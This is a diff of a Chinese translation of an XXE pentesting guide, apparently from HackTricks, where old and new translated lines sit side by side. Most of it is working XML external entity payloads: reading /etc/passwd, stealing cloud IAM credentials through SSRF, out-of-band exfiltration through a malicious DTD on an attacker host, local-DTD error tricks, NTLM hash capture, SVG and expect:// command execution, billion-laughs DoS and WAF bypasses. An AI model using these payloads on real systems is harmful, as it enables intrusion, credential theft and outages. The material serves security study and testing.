<!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
@ -45,11 +46,13 @@ XML是一种为数据存储和传输而设计的标记语言具有灵活的
<storeId>1</storeId>
</stockCheck>
```
![](<../.gitbook/assets/image (870).png>)
### 读取文件
让我们尝试以不同的方式读取 `/etc/passwd` 文件。对于Windows您可以尝试读取`C:\windows\system32\drivers\etc\hosts`
让我们尝试以不同的方式读取 `/etc/passwd`。对于 Windows你可以尝试读取: `C:\windows\system32\drivers\etc\hosts`
在这种情况下,请注意SYSTEM "_\*\*file:///\*\*etc/passwd_" 也可以工作
在这种情况下,请注意 SYSTEM "_\*\*file:///\*\*etc/passwd_" 也会有效
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
@ -57,13 +60,13 @@ XML是一种为数据存储和传输而设计的标记语言具有灵活的
```
![](<../.gitbook/assets/image (86).png>)
第二种情况应该可以用来提取文件如果Web服务器正在使用PHPPortswiggers实验室不适用
个第二个案例应该有助于提取文件如果web服务器使用PHPPortswiggers实验室的情况除外
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<data>&example;</data>
```
在这第三个案例中,请注意我们将`Element stockCheck`声明为ANY
在这第三个案例中,请注意我们将 `Element stockCheck` 声明为 ANY
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
@ -79,7 +82,7 @@ XML是一种为数据存储和传输而设计的标记语言具有灵活的
### 目录列表
在基于**Java**的应用程序中,可以通过类似以下的 XXE 负载(仅请求目录而非文件)来**列出目录的内容**
在基于**Java**的应用程序中,可能通过XXE使用如下有效载荷**列出目录的内容**(只请求目录而不是文件)
```xml
<!-- Root / -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
@ -89,27 +92,27 @@ XML是一种为数据存储和传输而设计的标记语言具有灵活的
```
### SSRF
XXE可能被用来滥用云中的SSRF
XXE 可以被用来滥用云中的 SSRF
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```
### SSRF
### Blind SSRF
使用**先前评论的技术**,您可以让服务器访问您控制的服务器以显示其存在漏洞。但是,如果这不起作用,可能是因为**不允许使用 XML 实体**,在这种情况下,您可以尝试使用**XML 参数实体**
使用**之前提到的技术**,您可以让服务器访问您控制的服务器以显示其存在漏洞。但是,如果这不起作用,可能是因为**不允许使用XML实体**,在这种情况下,您可以尝试使用**XML参数实体**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
### "盲" SSRF - 通过外带方式泄露数据
### "盲" SSRF - 通过带外方式提取数据
**在这种情况下,我们将让服务器加载一个带有恶意载荷的新DTD该载荷将通过HTTP请求发送文件内容对于多行文件您可以尝试通过 \_ftp://**\_ 来外带,例如使用这个基本服务器 [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**)。这个解释是基于** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**。**
**在这种情况下,我们将使服务器加载一个带有恶意负载的新 DTD该负载将通过 HTTP 请求发送文件的内容(对于多行文件,您可以尝试通过 \_ftp://**\_ 来提取它,例如使用这个基本服务器 [**xxe-ftp-server.rb**](https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb)**)。这个解释基于** [**Portswiggers 实验室**](https://portswigger.net/web-security/xxe/blind)**。**
在给定的恶意DTD中进行了一系列步骤来外带数据:
在给定的恶意 DTD 中,执行了一系列步骤以提取数据:
### 恶意DTD示例
### 恶意 DTD 示例:
结构如下:
```xml
@ -118,49 +121,55 @@ XXE可能被用来滥用云中的SSRF
%eval;
%exfiltrate;
```
这个DTD执行的步骤包括
The steps executed by this DTD include:
1. **参数实体的定义:**
1. **参数实体的定义**
* 创建一个 XML 参数实体 `%file`,读取 `/etc/hostname` 文件的内容。
* 定义另一个 XML 参数实体 `%eval`。它动态声明一个新的 XML 参数实体 `%exfiltrate`。`%exfiltrate` 实体被设置为向攻击者服务器发起 HTTP 请求,将 `%file` 实体的内容传递到 URL 的查询字符串中
2. **实体的执行:**
* `%eval` 实体,导致动态声明 `%exfiltrate` 实体的执行。
* 然后使用 `%exfiltrate` 实体,触发向指定 URL 发送文件内容的 HTTP 请求
* 定义另一个 XML 参数实体 `%eval`。它动态声明一个新的 XML 参数实体 `%exfiltrate`。`%exfiltrate` 实体被设置为向攻击者服务器发起 HTTP 请求,将 `%file` 实体的内容作为 URL 查询字符串的一部分传递
2. **实体的执行**
* 使`%eval` 实体,导致动态声明 `%exfiltrate` 实体的执行。
* 然后使用 `%exfiltrate` 实体,触发对指定 URL 的 HTTP 请求,包含文件的内容
攻击者将这个恶意 DTD 托管在他们控制的服务器上,通常在类似 `http://web-attacker.com/malicious.dtd` 的 URL
攻击者将这个恶意 DTD 托管在他们控制的服务器上,通常在类似 `http://web-attacker.com/malicious.dtd` 的 URL
**XXE Payload:** 为了利用一个存在漏洞的应用程序,攻击者发送一个 XXE 负载:
**XXE Payload:** To exploit a vulnerable application, the attacker sends an XXE payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
这个 payload 定义了一个 XML 参数实体 `%xxe` 并将其合并到 DTD 中。当被 XML 解析器处理时,这个 payload 会从攻击者的服务器中获取外部 DTD。然后解析器会内联解释 DTD执行恶意 DTD 中概述的步骤,导致 `/etc/hostname` 文件泄到攻击者的服务器。
这个有效负载定义了一个 XML 参数实体 `%xxe` 并将其纳入 DTD。当被 XML 解析器处理时,这个有效负载从攻击者的服务器获取外部 DTD。解析器随后内联解释 DTD执行恶意 DTD 中概述的步骤,导致 `/etc/hostname` 文件被外泄到攻击者的服务器。
### 基于错误的(外部 DTD
**在这种情况下,我们将让服务器加载一个恶意的 DTD该 DTD 将在错误消息中显示文件的内容(仅当您可以看到错误消息时才有效)。** [**示例在这里。**](https://portswigger.net/web-security/xxe/blind)
**在这种情况下,我们将使服务器加载一个恶意 DTD该 DTD 将在错误消息中显示文件的内容(这仅在您可以看到错误消息时有效)。** [**示例来自这里。**](https://portswigger.net/web-security/xxe/blind)
通过恶意的外部文档类型定义DTD可以触发 XML 解析错误消息,从而显示 `/etc/passwd` 文件的内容。实现这一目标的步骤如下
可以通过使用恶意外部文档类型定义DTD触发一个 XML 解析错误消息,揭示 `/etc/passwd` 文件的内容。这是通过以下步骤完成的
1. 定义一个名为 `file` 的 XML 参数实体,其中包含 `/etc/passwd` 文件的内容。
2. 定义一个名为 `eval` 的 XML 参数实体,合并了另一个名为 `error` 的 XML 参数实体的动态声明。当评估这个 `error` 实体时,它会尝试加载一个不存在的文件,并`file` 实体的内容作为其名称。
3. 调用 `eval` 实体,导致动态声明 `error` 实体。
4. 调用 `error` 实体尝试加载一个不存在的文件,产生一个错误消息,其中包含 `/etc/passwd` 文件的内容作为文件名的一部分。
2. 定义一个名为 `eval` 的 XML 参数实体,包含对另一个 XML 参数实体 `error` 的动态声明。当评估该 `error` 实体时,尝试加载一个不存在的文件,`file` 实体的内容作为其名称。
3. 调用 `eval` 实体,导致 `error` 实体的动态声明
4. 调用 `error` 实体导致尝试加载一个不存在的文件,产生一个错误消息,其中包含 `/etc/passwd` 文件的内容作为文件名的一部分。
可以使用以下 XML 调用恶意外部 DTD
可以使用以下 XML 调用恶意外部 DTD
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
### **基于错误的 (系统 DTD)**
Upon execution, the web server's response should include an error message displaying the contents of the `/etc/passwd` file.
那么当**禁止带外交互**(无法进行外部连接)时,盲目 XXE 漏洞如何处理呢?
![](<../.gitbook/assets/image (809).png>)
XML 语言规范中的一个漏洞可以通过错误消息**暴露敏感数据**,当文档的 DTD 混合了内部和外部声明时。这个问题允许在内部重新定义在外部声明的实体,促进基于错误的 XXE 攻击的执行。这种攻击利用了在内部 DTD 中重新定义 XML 参数实体,该实体最初在外部 DTD 中声明。当服务器阻止带外连接时,攻击者必须依赖本地 DTD 文件来执行攻击,旨在诱发解析错误以揭示敏感信息。
_**请注意,外部 DTD 允许我们在第二个(****`eval`****)内部包含一个实体,但在内部 DTD 中是禁止的。因此,通常情况下,您无法强制产生错误而不使用外部 DTD。**_
考虑这样一个场景,服务器的文件系统包含一个位于 `/usr/local/app/schema.dtd` 的 DTD 文件,定义了一个名为 `custom_entity` 的实体。攻击者可以通过提交混合 DTD 来诱发 XML 解析错误,从而揭示 `/etc/passwd` 文件的内容。
### **基于错误(系统 DTD**
那么,当 **出带外交互被阻止**(外部连接不可用)时,盲 XXE 漏洞怎么办?
XML 语言规范中的一个漏洞可以 **通过错误消息暴露敏感数据,当文档的 DTD 混合内部和外部声明时**。这个问题允许内部重新定义外部声明的实体,从而促进基于错误的 XXE 攻击的执行。这种攻击利用了从内部 DTD 中重新定义原本在外部 DTD 中声明的 XML 参数实体。当服务器阻止出带外连接时,攻击者必须依赖本地 DTD 文件进行攻击,旨在诱发解析错误以揭示敏感信息。
考虑一个场景,其中服务器的文件系统在 `/usr/local/app/schema.dtd` 处包含一个 DTD 文件,定义了一个名为 `custom_entity` 的实体。攻击者可以通过提交一个混合 DTD 来诱发 XML 解析错误,从而揭示 `/etc/passwd` 文件的内容,如下所示:
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
@ -173,13 +182,13 @@ XML 语言规范中的一个漏洞可以通过错误消息**暴露敏感数据**
%local_dtd;
]>
```
以下是由此DTD执行的步骤
The outlined steps are executed by this DTD:
* 定义了一个名为`local_dtd`的XML参数实体其中包含位于服务器文件系统上的外部DTD文件。
* 对`custom_entity` XML参数实体进行重新定义最初在外部DTD中定义以封装一个[基于错误的XXE利用](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages)。这种重新定义旨在引发解析错误,从而暴露`/etc/passwd`文件的内容。
* 通过使用`local_dtd`实体,启用了外部DTD包含新定义的`custom_entity`。这一系列操作导致了利用所针对的错误消息的发出。
* XML参数实体`local_dtd`的定义包括位于服务器文件系统上的外部DTD文件。
* 对`custom_entity` XML参数实体进行重新定义该实体最初在外部DTD中定义以封装一个[基于错误的XXE漏洞](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages)。此重新定义旨在引发解析错误,暴露`/etc/passwd`文件的内容。
* 通过使用`local_dtd`实体外部DTD被调用,包含新定义的`custom_entity`。这一系列操作导致了漏洞所针对的错误消息的发出。
**实际示例:** 使用GNOME桌面环境的系统通常在`/usr/share/yelp/dtd/docbookx.dtd`上有一个DTD其中包含一个名为`ISOamso`的实体。
**Real world example:** 使用GNOME桌面环境的系统通常在`/usr/share/yelp/dtd/docbookx.dtd`中有一个DTD其中包含一个名为`ISOamso`的实体。
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
@ -196,22 +205,22 @@ XML 语言规范中的一个漏洞可以通过错误消息**暴露敏感数据**
```
![](<../.gitbook/assets/image (625).png>)
由于这种技术使用**内部 DTD您首先需要找到一个有效的 DTD**。您可以通过**安装**与服务器相同的**操作系统/软件**,然后**搜索一些默认的 DTD**,或者**获取系统中默认 DTD 的列表**,然后**检查**是否存在其中之一
由于此技术使用**内部 DTD您需要首先找到一个有效的 DTD**。您可以通过**安装**服务器使用的相同**操作系统/软件**并**搜索一些默认 DTD**,或者**获取系统内的默认 DTD 列表**并**检查**它们是否存在
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
```
了解更多信息,请查看[https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind)
For more information check [https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind)
### 在系统中查找DTDs
### 在系统中查找 DTD
在以下令人印象深刻的 GitHub 存储库中,您可以找到**可能存在于系统中的DTDs的路径**
在以下精彩的 GitHub 仓库中,您可以找到 **可能存在于系统中的 DTD 路径**
{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}
此外,如果您拥有**受害系统的Docker镜像**,您可以使用同一存储库中的工具**扫描**该**镜像**并**查找**系统中存在的**DTDs**的路径。阅读[GitHub 的自述文件](https://github.com/GoSecure/dtd-finder)以了解详情
此外,如果您拥有 **受害者系统的 Docker 镜像**,您可以使用同一仓库的工具来 **扫描** **镜像****查找** 系统中存在的 **DTD** 路径。请阅读 [GitHub 的自述文件](https://github.com/GoSecure/dtd-finder) 以了解如何操作
```bash
java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar
@ -223,48 +232,48 @@ Testing 0 entities : []
[=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd
Testing 0 entities : []
```
### 通过 Office Open XML 解析器进行 XXE 攻击
### XXE via Office Open XML Parsers
深入了解这种攻击,请查看[这篇精彩文章](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/)的第二部分,来自 Detectify
更深入地了解此攻击,**请查看** [**这篇精彩的文章**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) **来自 Detectify 的第二部分**
许多 Web 应用程序提供了上传 Microsoft Office 文档的功能然后从这些文档中提取某些详细信息。例如Web 应用程序可能允许用户通过上传 XLSX 格式的电子表格来导入数据。为了从电子表格中提取数据,解析器必然需要解析至少一个 XML 文件。
许多网络应用程序**提供上传 Microsoft Office 文档的功能**,然后提取这些文档中的某些细节。例如,网络应用程序可能允许用户通过上传 XLSX 格式的电子表格来导入数据。为了让解析器从电子表格中提取数据,它不可避免地需要解析至少一个 XML 文件。
要测试此漏洞,需要创建一个包含 XXE 负载的 Microsoft Office 文件。第一步是创建一个空目录,以便可以将文档解压缩到其中。
要测试此漏洞,需要创建一个**包含 XXE 有效负载的 Microsoft Office 文件**。第一步是创建一个空目录,以便将文档解压缩到其中。
文档解压缩后,应打开位于 `./unzipped/word/document.xml` 的 XML 文件,并在首选文本编辑器(如 vim中进行编辑。应修改 XML 以包含所需的 XXE 负载,通常以 HTTP 请求开头。
文档解压缩后,应在首选文本编辑器(如 vim打开并编辑位于 `./unzipped/word/document.xml` 的 XML 文件。应修改 XML 以包含所需的 XXE 有效负载,通常以 HTTP 请求开头。
修改后的 XML 行应插入两个根 XML 对象之间。重要的是将 URL 替换为可监控请求的 URL。
修改后的 XML 行应插入两个根 XML 对象之间。重要的是将 URL 替换为可监控请求的 URL。
最后,可以将文件压缩为恶意 poc.docx 文件。从先前创建的 "unzipped" 目录中,应运行以下命令:
最后,可以将文件压缩以创建恶意的 poc.docx 文件。从之前创建的“unzipped”目录中,应运行以下命令:
现在,可以将创建的文件上传到可能存在漏洞的 Web 应用程序,并希望在 Burp Collaborator 日志中出现请求。
现在,可以将创建的文件上传到潜在的易受攻击的网络应用程序,并希望在 Burp Collaborator 日志中出现请求。
### Jar 协议
### Jar: protocol
**jar** 协议仅在 **Java 应用程序** 中可用。它旨在**PKZIP** 存档(例如 `.zip`、`.jar` 等)中启用文件访问,适用于本地和远程文件。
**jar** 协议仅在 **Java 应用程序** 中可用。它旨在启用对 **PKZIP** 存档(例如,`.zip`、`.jar` 等)内的文件访问,适用于本地和远程文件。
```
jar:file:///var/myarchive.zip!/file.txt
jar:https://download.host.com/myarchive.zip!/file.txt
```
{% hint style="danger" %}
访问 PKZIP 文件内部的文件对于通过系统 DTD 文件滥用 XXE 非常有用。查看[此部分以了解如何滥用系统 DTD 文件](xxe-xee-xml-external-entity.md#error-based-system-dtd)。
能够访问PKZIP文件中的文件对**利用系统DTD文件进行XXE攻击非常有用。** 请查看[本节以了解如何利用系统DTD文件](xxe-xee-xml-external-entity.md#error-based-system-dtd)。
{% endhint %}
通过 jar 协议访问 PKZIP 存档中文件的过程涉及几个步骤:
通过jar协议访问PKZIP归档文件中的文件的过程涉及几个步骤:
1. 发出 HTTP 请求以从指定位置下载 zip 存档,例如 `https://download.website.com/archive.zip`
2. 包含存档的 HTTP 响应被临时存储在系统中,通常在类似 `/tmp/...`位置。
3. 然后解压存档以访问其内容。
4. 读取存档中的特定文件 `file.zip`
1. 发出HTTP请求从指定位置下载zip归档例如`https://download.website.com/archive.zip`
2. 包含归档的HTTP响应临时存储在系统上通常在`/tmp/...`位置。
3. 然后提取归档以访问其内容。
4. 读取归档中的特定文件`file.zip`
5. 操作完成后,删除在此过程中创建的任何临时文件。
一种有趣的技术是在第二步中中断此过程,方法是在提供存档文件时保持服务器连接无限期打开。可利用[此存储库中的工具](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write\_xxe/solution),包括 Python 服务器 (`slow_http_server.py`) 和 Java 服务器 (`slowserver.jar`)
在第二步中中断此过程的一个有趣技术是,在提供归档文件时保持服务器连接无限期打开。可以利用[这个仓库](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write\_xxe/solution)中的工具来实现这一目的包括一个Python服务器`slow_http_server.py`和一个Java服务器`slowserver.jar`
```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://attacker.com:8080/evil.zip!/evil.dtd">]>
<foo>&xxe;</foo>
```
{% hint style="danger" %}
在临时目录中写文件可以帮助**升级涉及路径遍历的另一个漏洞**如本地文件包含、模板注入、XSLT RCE、反序列化等
在临时目录中写文件可以帮助**升级另一个涉及路径遍历的漏洞**如本地文件包含、模板注入、XSLT RCE、反序列化等
{% endhint %}
### XSS
@ -273,7 +282,7 @@ jar:https://download.host.com/myarchive.zip!/file.txt
```
### DoS
#### 十亿笑攻击
#### 十亿笑攻击
```xml
<!DOCTYPE data [
<!ENTITY a0 "dos" >
@ -284,7 +293,7 @@ jar:https://download.host.com/myarchive.zip!/file.txt
]>
<data>&a4;</data>
```
#### Yaml攻击
#### Yaml 攻击
```xml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
@ -296,13 +305,13 @@ g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
#### 二次方膨胀攻击
#### 二次爆炸攻击
![](<../.gitbook/assets/image (527).png>)
#### 获取 NTML
在 Windows 主机上,可以通过设置 responder.py 处理程序来获取 Web 服务器用户的 NTML 哈希值
在 Windows 主机上,可以通过设置 responder.py 处理程序来获取 web 服务器用户的 NTML 哈希
```bash
Responder.py -I eth0 -v
```
@ -312,43 +321,45 @@ Responder.py -I eth0 -v
<!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
<data>&example;</data>
```
## 隐藏的XXE表面
Then you can try to crack the hash using hashcat
## 隐藏的 XXE 表现
### XInclude
当将客户端数据集成到服务器端XML文档中比如后端SOAP请求中的文档时由于对XML结构的直接控制通常受限传统的XXE攻击受到限制因为无法修改`DOCTYPE`元素。然而,`XInclude`攻击提供了一种解决方案允许在XML文档的任何数据元素中插入外部实体。即使只能控制服务器生成的XML文档中的部分数据这种方法也是有效的。
在将客户端数据集成到服务器端 XML 文档中时,例如后端 SOAP 请求中的文档,通常对 XML 结构的直接控制是有限的,这使得由于对修改 `DOCTYPE` 元素的限制而阻碍了传统的 XXE 攻击。然而,`XInclude` 攻击提供了解决方案,通过允许在 XML 文档的任何数据元素中插入外部实体。即使只能控制服务器生成的 XML 文档中的部分数据,这种方法也是有效的。
要执行`XInclude`攻击,必须声明`XInclude`命名空间,并指定所需外部实体的文件路径。以下是一个简洁的示例,展示了如何构建这样一种攻击
要执行 `XInclude` 攻击,必须声明 `XInclude` 命名空间,并指定所需外部实体的文件路径。以下是如何制定此类攻击的简洁示例
```xml
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
```
查看更多信息,请访问[https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)
检查 [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) 以获取更多信息
### SVG - 文件上传
用户上传到某些应用程序的文件,然后在服务器上进行处理,可能会利用处理 XML 或包含 XML 的文件格式的漏洞。常见的文件格式如办公文档DOCX和图像SVG都是基于 XML 的
用户上传到某些应用程序的文件,然后在服务器上处理,可能会利用 XML 或包含 XML 的文件格式处理中的漏洞。常见的文件格式如办公文档 (DOCX) 和图像 (SVG) 基于 XML
当用户**上传图像**时,这些图像会在服务器端进行处理或验证。即使期望 PNG 或 JPEG 等格式的应用程序,**服务器的图像处理库也可能支持 SVG 图像**。由于 SVG 是基于 XML 的格式,攻击者可以利用恶意 SVG 图像来提交恶意内容,从而使服务器面临 XXEXML External Entity漏洞。
当用户 **上传图像** 时,这些图像会在服务器端进行处理或验证。即使对于期望 PNG 或 JPEG 等格式的应用程序,**服务器的图像处理库也可能支持 SVG 图像**。由于 SVG 是基于 XML 的格式,攻击者可以利用这一点提交恶意 SVG 图像,从而使服务器暴露于 XXE (XML External Entity) 漏洞。
下面展示了这种利用的示例,其中恶意 SVG 图像尝试读取系统文件:
下面展示了一个此类攻击的示例,其中恶意 SVG 图像试图读取系统文件:
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>
```
另一种方法涉及尝试通过 PHP "expect" 包装器执行命令:
另一种方法涉及尝试通过 PHP "expect" 包装器 **执行命令**
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
```
在这两种情况下SVG 格式被用来发动攻击,利用服务器软件的 XML 处理能力,突显了对强大的输入验证和安全措施的需求
在这两种情况下SVG 格式被用来发起攻击,利用服务器软件的 XML 处理能力,突显了强大输入验证和安全措施的必要性
查看[https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)获取更多信息!
查看 [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) 获取更多信息!
**注意读取文件的第一行或执行结果将出现在创建的图像内部。因此,您需要能够访问 SVG 创建的图像。**
**注意读取文件的第一行或执行结果将出现在创建的图像内部。因此,您需要能够访问 SVG 创建的图像。**
### **PDF - 文件上传**
阅读以下文章以**了解如何利用 XXE 上传 PDF 文件**
阅读以下帖子以**了解如何利用 XXE 上传 PDF** 文件
{% content-ref url="file-upload/pdf-upload-xxe-and-cors-bypass.md" %}
[pdf-upload-xxe-and-cors-bypass.md](file-upload/pdf-upload-xxe-and-cors-bypass.md)
@ -364,7 +375,7 @@ Content-Length: 7
foo=bar
```
然后您可以尝试提交以下请求,结果将会相同:
然后您可能能够提交以下请求,结果相同:
```xml
POST /action HTTP/1.0
Content-Type: text/xml
@ -372,9 +383,9 @@ Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
```
### 内容类型从JSON到XEE
### Content-Type: 从 JSON 到 XEE
要更改请求,您可以使用名为“**Content Type Converter**”的Burp扩展。[这里](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html)您可以找到这个例:
要更改请求,您可以使用一个名为“**Content Type Converter**”的 Burp 扩展。 [这里](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html) 您可以找到这个例
```xml
Content-Type: application/json;charset=UTF-8
@ -402,19 +413,19 @@ Content-Type: application/xml;charset=UTF-8
</root>
</root>
```
另一个例可以在[这里](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2)找到。
另一个例可以在 [这里](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2) 找到。
## WAF & Protections Bypasses
## WAF 和保护绕过
### Base64
```xml
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
```
只有在XML服务器接受`data://`协议时才有效。
仅在 XML 服务器接受 `data://` 协议时有效。
### UTF-7
您可以在此处使用\[**CyberChef的“编码配方”**](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)将转换为UTF-7。
您可以在这里使用 \[**"Encode Recipe**" of cyberchef ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) 转换为 UTF-7。
```xml
<!xml version="1.0" encoding="UTF-7"?-->
+ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
@ -426,17 +437,17 @@ Content-Type: application/xml;charset=UTF-8
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
### 文件:/ 协议绕过
### File:/ 协议绕过
如果网站使用 PHP可以使用 **php wrappers** `php://filter/convert.base64-encode/resource=` 来**访问内部文件**,而不是使用 `file:/`
如果网站使用 PHP可以使用 **php wrappers**`php://filter/convert.base64-encode/resource=` **访问内部文件**。
如果网站使用 Java您可以查看[**jar: 协议**](xxe-xee-xml-external-entity.md#jar-protocol)。
如果网站使用 Java您可以检查 [**jar: 协议**](xxe-xee-xml-external-entity.md#jar-protocol)。
### HTML 实体
来自 [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\
您可以创建一个**实体内部的实体**,使用**html实体**对其进行编码,然后调用它来**加载一个dtd**。\
请注意,所使用的**HTML实体**需要是**数字**的(例如\[在这个例子中]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C))
您可以创建一个 **实体内部的实体**,通过 **html 实体** 编码,然后调用它来 **加载 dtd**。\
